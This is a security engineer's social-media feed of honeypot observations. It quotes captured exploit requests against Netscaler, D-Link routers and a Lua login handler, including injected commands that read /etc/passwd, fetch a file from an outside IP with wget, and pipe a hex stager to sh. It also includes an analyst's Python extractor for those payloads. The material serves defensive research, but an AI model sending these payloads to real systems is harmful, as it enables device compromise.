Niels Heinen

68 Followers
61 Following
82 Posts
Information security engineer - security at scale - honeypots
Github: https://github.com/mrheinen
Exploit Database: Citrix Nitro SDK - Command Injection (CVE-119834, CVE-2015-2838). webapps exploit for Linux platform

Interesting Netscaler payload caught by my Lophiid honeypots:

GET /nitro/v1/config/systemfile?args=filename:/etc/passwd%3Bping%20-c%204%20178.16.54.17 HTTP/1.1
Host: x.x.x.x
Connection: close
X-Nitro-Pass: nsroot
X-Nitro-User: nsroot

Does anyone know this vuln?

#honeypot #dfir #infosec #cybersecurity

After adding emulation of HPE OneView to my honeypots, I'm seeing quite an uptick in scans for it. Could be coincidence but regardless it's interesting to see so much traffic for a rather unpopular (?) service. Shodan for example shows 27 instances at the moment.

#infosec #cybersecurity #dfir #honeypot

Just under a year ago I was planning to leave Google after 10 years. Since then I've been considering what's next (and doing some advisory work on the side).

I've slowly been giving more and more thought to how to give back in a sustainable way that works for me.

With that in mind, if you know of any organisations who offer security consulting/testing (pentesting) for NGOs or other worthy causes, please share 🙏

(Please re-toot for reach)

Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I see this specific vuln being exploited.

An example request:

SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0

#honeypot #dfir #infosec #cybersecurity #threatintel

My lophiid honeypots use various LLM models for different tasks. For shell code execution emulation they use Gemini 2.5 Flash and it dealt with this payload really nicely:

echo 7c6563686f2532305243455f544553545f313233 | xxd -r -p | sh

It correctly understood that xxd reversed the hex and it understood that the resulting string was a shell command that echoed the string "RCE_TEST_123".

I think this is pretty cool. Shell code emulation with LLMs has a lot of potential.

#infosec #dfir #honeypot

Stubborn AI honeypots give me grey hair.

Attacker sends payload:

"username=anonymous%00]]%0dlocal+h+%3d+io.popen("this is vulnerable to CVE-2025-47812")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password="

And the AI responsible for handling the response sends the following back to the attacker:

"This system is not affected by CVE-2025-47812."

*sigh*

#dfir #infosec #cybersecurity #honeypot
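Added example (my own code, not part of Lophiid or of any post above): a small Python extractor that pulls the attacker-supplied command out of the four payloads quoted in this feed: the Netscaler Nitro query, the D-Link SUBSCRIBE request line (whose target contains literal spaces and backticks, so naive whitespace splitting breaks), the echo|xxd hex stager, and the Lua io.popen login body. The request lines and body are reconstructed from the posts; the "POST / HTTP/1.1" line used for the Lua case, the function names and the extraction rules are assumptions of this example.

```python
"""Pull attacker-controlled commands out of honeypot-captured HTTP requests.

Added example, not Lophiid code. Sample requests are constructed from the
payloads quoted in the posts above; the extraction rules are assumptions.
"""
import re
from urllib.parse import unquote_plus

# Constructed copies of the request lines / body shown in the posts.
NITRO_REQUEST = (
    "GET /nitro/v1/config/systemfile?args=filename:/etc/passwd"
    "%3Bping%20-c%204%20178.16.54.17 HTTP/1.1"
)
DLINK_REQUEST = (
    "SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/"
    "81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1"
)
XXD_COMMAND = "echo 7c6563686f2532305243455f544553545f313233 | xxd -r -p | sh"
LUA_BODY = (
    'username=anonymous%00]]%0dlocal+h+%3d+io.popen("this is vulnerable to '
    'CVE-2025-47812")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)'
    "%0d--&password="
)

SEPARATORS = re.compile(r";|&&|\|\||\|")               # shell command chaining
SUBSTITUTION = re.compile(r"`([^`]*)`|\$\(([^)]*)\)")   # `...` or $(...)
XXD_STAGE = re.compile(r"echo\s+([0-9a-fA-F]+)\s*\|\s*xxd\s+-r\s+-p")
LUA_POPEN = re.compile(r'io\.popen\(\s*"([^"]*)"')


def parse_request_line(line):
    """Split 'METHOD target HTTP/x.y'. The target may itself contain spaces
    (the D-Link payload does), so cut at the first space and the last
    ' HTTP/' instead of splitting on whitespace."""
    method, _, rest = line.partition(" ")
    idx = rest.rfind(" HTTP/")
    if not method or idx < 0:
        raise ValueError("malformed request line")
    return method, rest[:idx], rest[idx + 1:]


def form_params(data):
    """Decode a query string or form body into (name, value) pairs.
    Split on '&' only: the D-Link target carries a literal ';', which
    parse_qsl on older Python versions would treat as a separator."""
    pairs = []
    for part in data.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def split_commands(text):
    """Break a chained shell string into its individual commands."""
    return [c.strip() for c in SEPARATORS.split(text) if c.strip()]


def decode_xxd_stage(command):
    """Undo an 'echo <hex> | xxd -r -p | sh' stager; None if it is not one."""
    m = XXD_STAGE.search(command)
    if not m:
        return None
    try:
        return bytes.fromhex(m.group(1)).decode("utf-8", "replace")
    except ValueError:          # odd-length or otherwise broken hex
        return None


def injected_commands(value):
    """Return the commands smuggled into one URL-decoded parameter value."""
    found = []
    decoded = decode_xxd_stage(value)
    if decoded is not None:     # show the analyst the second stage, not the hex
        found.append(decoded)
    for m in SUBSTITUTION.finditer(value):
        inner = m.group(1) if m.group(1) is not None else m.group(2)
        found.extend(split_commands(inner))
    if not found and SEPARATORS.search(value):
        # chaining after a legitimate-looking prefix: drop the first segment
        found.extend(split_commands(value)[1:])
    for m in LUA_POPEN.finditer(value):
        found.append(m.group(1))
    return found


def analyze(request_line, body=""):
    """Map parameter name -> injected commands for one request (+ optional body)."""
    method, target, _ = parse_request_line(request_line)
    path, _, query = target.partition("?")
    findings = {}
    for name, value in form_params(query) + form_params(body):
        cmds = injected_commands(value)
        if cmds:
            findings[name] = cmds
    return {"method": method, "path": path, "findings": findings}


if __name__ == "__main__":
    # "POST / HTTP/1.1" is an assumed request line; the post shows only the body.
    for line, body in ((NITRO_REQUEST, ""), (DLINK_REQUEST, ""),
                       ("POST / HTTP/1.1", LUA_BODY)):
        print(analyze(line, body))
    print(injected_commands(XXD_COMMAND))
```

The hex stage decodes to "|echo%20RCE_TEST_123", still carrying a percent-encoded space, so the honeypot (or an LLM emulating the shell) has to tolerate a second layer of decoding before the echo makes sense.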

My Lophiid honeypots got spammed with payloads like "234513+true+1994175". The LLM integration understood the intricacies of JavaScript and caused the honeypots to respond with the correct answer 2228689.

#honeypot #dfir #infosec #aisecurity #cybersecurity #llm

#react2shell exploitation seems to have reached a peak today. Exploit attempts since last week (against my honeypots):

day | request_count
------------+---------------
2025-12-24 | 41209
2025-12-23 | 19835
2025-12-22 | 34962
2025-12-21 | 13141
2025-12-20 | 15490
2025-12-19 | 22307
2025-12-18 | 9901
2025-12-17 | 18376

#honeypot #infosec #dfir #cybersecurity

Found in a #react2shell payload

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxtherespoopalloverme

I refuse to grow up: things like this make me smile ;-)

#honeypot #dfir #infosec #cybersecurity